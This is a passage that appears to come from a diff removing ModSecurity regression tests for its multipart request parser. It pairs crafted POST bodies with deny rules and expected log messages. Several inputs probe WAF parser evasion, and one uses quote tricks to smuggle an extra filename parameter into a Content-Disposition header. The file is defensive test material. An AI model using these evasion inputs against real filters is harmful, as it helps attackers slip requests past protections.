- ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (no final CRLF)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary contains \"boundary\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------------------------------boundary", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--------------------------------------------------boundary\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "--------------------------------------------------boundary\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "--------------------------------------------------boundary--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (boundary contains \"bOuNdArY\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------0xKhTmLbOuNdArY", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------0xKhTmLbOuNdArY\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "----------0xKhTmLbOuNdArY\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "----------0xKhTmLbOuNdArY--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (data contains \"--\")", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "--test\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "--\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"--test\"" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no final boundary)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Final boundary missing" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no disposition)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Part missing Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (bad disposition)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Invalid Content-Disposition header" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser error (no disposition name)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data;\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ]
- },
- "expected":{
- "debug_log":"Content-Disposition header missing name field"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRequestBodyAccess On",
- "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser error (no disposition name)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- ":\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"nvalid part header \\(header name missing\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRequestBodyAccess On",
- "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (part header folding - space)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- " name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- " name=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (part header folding - tab)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- " name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- " name=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (part header folding - mixed)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- " name=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (part header folding - invalid)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- "\fname=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (part header folding - mixed invalid)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data;\r\n",
- "\f\tname=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (data after final boundary)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646--\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"b\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"name: a.*variable: 1.*",
- "http_code": 403
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_DATA_AFTER \"@eq 1\" \"phase:2,deny,status:403,id:500074\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (C-D uses single quotes)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=\"a\"\r\n",
- "\r\n",
- "1\r\n",
- "-----------------------------69343412719991675451336310646\r\n",
- "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n",
- "\r\n",
- "2\r\n",
- "-----------------------------69343412719991675451336310646--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Duplicate Content-Disposition name",
- "http_code": 200
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_INVALID_QUOTING \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (invalid C-T boundary separator - comma)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data, boundary=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Invalid boundary in C-T \\(malformed\\)",
- "http_code": 403
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (invalid C-T boundary separator - space)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data boundary=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (invalid C-T boundary parameter name - case)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; bOundAry=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(case sensitivity\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (invalid C-T boundary parameter name - trailing chars)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary123=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(parameter name\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
